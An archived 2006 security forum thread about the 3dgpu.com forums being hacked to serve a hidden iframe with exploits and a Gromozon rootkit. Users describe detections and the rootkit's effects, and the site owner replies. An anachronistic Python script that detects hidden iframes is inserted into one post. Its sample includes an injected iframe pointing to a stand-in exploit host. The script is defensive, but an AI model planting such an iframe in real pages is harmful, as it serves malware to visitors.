eset please check out 3dgpu.com forums.

Discussion in 'malware problems & news' started by attila4000, Oct 10, 2006.

Thread Status:
Not open for further replies.
  1. attila4000

    attila4000 Registered Member

    Joined:
    Feb 7, 2005
    Posts:
    51
    Location:
    Rahway, NJ, USA
    3dgpu.com forums tried but failed to infect me with a variant of win32/exploit.wmf trojan and a html/exploit.ieslice trojan.
    it is on the web page section for:

    Monday - October 9th, 2006
    I went to click the link: You can read more in our forums here.

    I am unable to contact Adam at the bottom of the section.
     
  2. phasechange

    phasechange Registered Member

    Joined:
    Aug 10, 2004
    Posts:
    359
    Location:
    Edinburgh
    must not try link... must not try link... :D
     
  3. Firecat

    Firecat Registered Member

    Joined:
    Jan 2, 2005
    Posts:
    7,927
    Location:
    The land of no identity :D
    I don't think it was intentional. AFAIK 3DGPU is not a rogue site....
     
  4. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Yeah, they've been compromised. There's an iframe that loads hxxp://link removed which contains various exploits, the malware executable/infection starter is located at hxxp://link removed.
     
    Last edited by a moderator: Oct 11, 2006
  5. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    I checked out the forum page and it tried to download "www.trwyol.com" file, this is only detected by 3 AV's as 'suspicious'.
     
  6. the_sly_dog

    the_sly_dog Registered Member

    Joined:
    Feb 28, 2006
    Posts:
    297
    Location:
    The Heart Of London
    hi all

    I did try to go to that forum and my NOD32 went mad and warned me too.

    IMON says infected 16, cleaned 6, and sent two files to the lab for analysis.

    Does that mean NOD32 caught all the infections it tried to give me? o_O

    http://img291.imageshack.us/img291/9899/desktopfq6.jpg

    The file 'link removed' has been sent to Eset's labs for analysis.

    The file 'Matrix.class' has been sent to Eset's labs for analysis.
     
    Last edited by a moderator: Oct 11, 2006
  7. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Weird, it didn't do the same thing to me. That name 'www.trwyol.com' looks like a typical gromozon symptom. Be very careful with this site, gromozon is unbelievably bad news... :(
     
  8. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    I'm using Firefox, didn't receive any warnings from NOD32 at all. I've got it zipped up and will send it to all AV vendors.
     
  9. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Yeah, the iframe just loads an empty page with Firefox. I tested it with wget and custom user agent...
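TNT's observation above (the injected iframe is served to Internet Explorer but an empty page comes back for Firefox or wget with a custom User-Agent) is the classic sign of user-agent cloaking on a compromised site. The following is an added example, not code from the thread or from 3dgpu.com: it scans HTML for iframes that are deliberately hidden (zero-size, display:none, off-screen) and compares the pages returned to several client labels. The sample pages and the domain `exploit.example` are constructed placeholders; in practice the `responses` dict would be filled from fetches made with different User-Agent strings from an isolated machine.

```python
"""Detect hidden iframes in fetched HTML and flag user-agent-dependent
serving. Added example for the thread above; sample pages and domains
below are constructed, not taken from the compromised site."""
from html.parser import HTMLParser
import re


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attribute values may be None for bare attributes
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse '0', '1px' into an int pixel count; None if unknown/percent."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """Heuristics for an iframe meant not to be seen by the visitor:
    tiny size, display:none / visibility:hidden, or positioned far off-screen."""
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if w is not None and h is not None and (w <= 1 or h <= 1):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(left|top):-\d{3,}", style):  # e.g. left:-1000px
        return True
    return False


def find_hidden_iframes(html):
    """Return the src URLs of iframes in `html` that look deliberately hidden."""
    p = IframeCollector()
    p.feed(html)
    return [a.get("src", "") for a in p.iframes if is_hidden(a)]


def ua_dependent_iframes(responses):
    """responses: {client_label: html}. Return the labels that were served a
    hidden iframe. Cloaking is suspected when some labels got one and others
    did not, which is exactly what the thread reports (IE yes, Firefox/wget no)."""
    return sorted(ua for ua, html in responses.items() if find_hidden_iframes(html))


# Constructed sample: the same forum page as three different clients saw it.
_PAGE = "<html><body><h1>Forum</h1><p>welcome</p>{inject}</body></html>"
SAMPLE_RESPONSES = {
    "msie6": _PAGE.format(
        inject='<iframe src="http://exploit.example/in.php" width="0" height="0"></iframe>'
    ),
    "firefox": _PAGE.format(inject=""),
    "wget": _PAGE.format(inject=""),
}

if __name__ == "__main__":
    served = ua_dependent_iframes(SAMPLE_RESPONSES)
    print("hidden iframe served to:", served)
    if served and len(served) < len(SAMPLE_RESPONSES):
        print("user-agent dependent injection suspected; inspect the page template on the server")
```

The size and style heuristics deliberately err on the side of flagging: a legitimate zero-size iframe is rare on a forum page, and a hit is a prompt to inspect the server-side template or database for injected markup, not proof on its own.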
     
  10. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Antivir blocked everything as expected :D
     
  11. JerryM

    JerryM Registered Member

    Joined:
    Aug 31, 2003
    Posts:
    4,221
    What version are you using, Classic or Premium? I guess there would not be a difference in the detection.

    Thanks,
    Jerry
     
  12. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    I use Classic...yep...they both use the exact same scanning engine and definition database.
     
  13. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Yeah...same happens with opera.
     
  14. Technodrome

    Technodrome Security Expert

    Joined:
    Feb 13, 2002
    Posts:
    2,140
    Location:
    New York
    All malware links were removed. Please do not post direct links to malware/infected files in your post.


    tD
     
    Last edited: Oct 11, 2006
  15. pykko

    pykko Registered Member

    Joined:
    Apr 27, 2005
    Posts:
    2,236
    Location:
    Romania...and walking to heaven
    Site seems down now, the forum section I mean. :(
     
  16. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    Update on the file "www.trwyol.com", it sits harmlessly on the desktop till activated, then once executed, it adds a BHO (emog.dll) on hijackthis, then when you open internet explorer it tries to download all manner of crap including 4 different files BOClean stopped, a trojan downloader and a new variant of Spysherrif adware. Also, it blocks access to this site, castlecops, gladiator and tech-guy sites on both firefox and IE.
     
  17. attila4000

    attila4000 Registered Member

    Joined:
    Feb 7, 2005
    Posts:
    51
    Location:
    Rahway, NJ, USA
    "I don't think it was intentional. AFAIK 3DGPU is not a rogue site...."

    It was not intentional, that is why I asked Eset to do the actual checking of the site's trojan link. They have isolated computers to check such a site without infecting an important work computer or LAN. This is the first time I went unknowingly to an infected forum. NOD32 stopped the trojans and IE crashed.
     
  18. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    You were right, I tried everything to sort it, even deleted the hosts file etc., but I still couldn't access security sites or run SuperAntiSpyware. I temporarily changed the name of SAS.exe, ran it and it detected the Gromozon rootkit in the Windows directory, removed it and all is fixed.
    This rootkit was completely missed by Blacklight, Sophos anti-rootkit and sysinternals rootkitrevealer, additionally it blocks you from accessing prevx website to download removal tool. :blink:
     
  19. mjkawecki

    mjkawecki Registered Member

    Joined:
    Oct 13, 2006
    Posts:
    2
    Hello, attila posted over at 3dgpu.com and left a comment linking here. While it seems as though the consensus/understanding here is that we at 3dgpu.com were hacked by an outside source, as the owner of 3dgpu, I wanted to confirm and assure everyone that we had less than zero to do with this.

    Unless of course you count having our IPB forum software down by one revision level (2.1.6 instead of the current 2.1.7).

    We acted quickly once it became apparent that we had been hacked and fixed the problem.

    My apologies to anyone affected by the hack. :doubt:
     
  20. mjkawecki

    mjkawecki Registered Member

    Joined:
    Oct 13, 2006
    Posts:
    2
    Attila, besides chasing you around the 'net and making it clear that this isn't a problem anymore despite the fashion in which you are presenting it, you made the statement that you were unable to contact Adam, why would you try to contact Adam instead of me (BULL @ 3dgpu).

    From my perspective, it seems as though you are taking a bit too much joy in posting this on different forums, implying (intentionally or otherwise) that our forums are still infected.

    This hack was devastating to our members/readership and traffic; please try not to make a point of overemphasizing it, especially after the fact, without letting it be known that it has been corrected.
     